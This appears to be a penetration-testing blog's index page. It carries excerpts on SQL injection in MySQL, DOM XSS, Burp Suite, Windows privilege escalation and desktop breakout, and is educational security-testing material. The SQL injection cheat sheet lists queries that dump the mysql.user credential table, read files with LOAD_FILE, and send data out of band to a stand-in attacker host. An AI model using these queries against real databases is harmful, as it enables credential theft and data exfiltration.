SQL Injection Cheat Sheet: MySQL

MSSQLMySQL Comments # /* — – ;%00 Version SELECT VERSION(); SELECT @@VERSION; SELECT @@GLOBAL.VERSION; User details user() current_user() system_user() session_user() SELECT user,password FROM mysql.user; Database details SELECT db_name(); SELECT database(); SELECT schema_name FROM information_schema.schemata; Database credentials SELECT host, user, password FROM mysql.user; Server details SELECT @@hostname; Table Name SELECT table_name FROM information_schema.tables; Columns Names SELECT column_name FROM information_schema.columns WHERE table_name = ‘tablename’; No Quotes CONCAT(CHAR(97), CHAR(98), CHAR(99)) String Concatenation CONCAT(foo, bar) Conditionals SELECT IF(1=1,’true’,’false’); Time-delay Sleep(10) Command Execution http://dev.mysql.com/doc/refman/5.1/en/adding-udf.html “RunAs” N/A Read Files SELECT LOAD_FILE(‘C:Windowswin.ini’); Out-of-Band Retrieval SELECT LOAD_FILE(concat(‘\\’,(SELECT 1), ‘attacker.controlledserver.com\’))); Substrings SELECT substr(‘Foobr’, 1, 1); Retrieve Nth Line SELECT …

Read More

An Introduction to DOM XSS

Document Object Model Based Cross-Site Scripting (DOM Based XSS) is a type of Cross-site Scripting where instead of the payloads being stored or reflected by the remote web server and appearing in the response HTML the payload is instead stored in the DOM and processed insecurely by JavaScript. For those unfamiliar with what the DOM is, a short and fairly untechnical overview is available here. The impact, and exploitation of DOM-XSS, is essentially the same as reflected or stored however the detection is a little different, as you can’t simply check the server responses and build up a payload. For example …

Read More

Introduction to Burp Suite Pro

Burp Suite is, as far as I’m concerned, the de facto tool for Web Application Assessments. It’s simple to use and takes little time to get the hang of, but to make sure you’re making the most out of your toolset, I thought I’d post a quick introduction to run through the main tabs and features. Burp Suite is a man-in-the-middle proxy which can intercept HTTP/HTTPS data from web browsers and mobile applications and allow you to read, modify, and repeat requests to servers. It can detect and monitor WebSockets. It’s ideal for testing for a range of security issues within …

Read More

PrivEsc: DLL Hijacking

I posted earlier about Privilege Escalation through Unquoted Service Paths and how it’s now rare to be able to exploit this in the real world due to the protected nature of the C:\Program Files and C:\Windows directories. It’s still possible to exploit this vulnerability, but only when the service executable is installed outside of these protect directories which in my experience is rare. Writing that post though got me thinking about another method of privilege escalation which I think is a little more common to see – DLL Hijacking.

Read More

PrivEsc: Insecure Service Permissions

/I’ve written a few articles recently about methods of escalating privileges on Windows machines, such as through DLL Hijacking and Unquoted Service Paths, so here I’m continuing the series with Privilege Escalation through Insecure Service configurations. This one’s  pretty simple issue really, generally speaking it’s simply a matter of altering the service so that it runs the executable and parameters you want it to, instead the default configuration allowing you to supply a command and privilege level for the execution. So you can simply run the add user command as local system and create your own local administrator account!

Read More

Windows Desktop Breakout

Many organisations “lock-down” their desktop environments to reduce the impact that malicious staff members and compromised accounts can have on the overall domain security. Many desktop restrictions can slow down an attacker but it’s often possible to “break-out” of the restricted environment. Both assessing and securing these desktop environments can be tricky, so I’ll run you through how I assess them here, highlight some of the tricks and the methodology that I use with the intention that both breakers and defenders can get a better look at their options.

Read More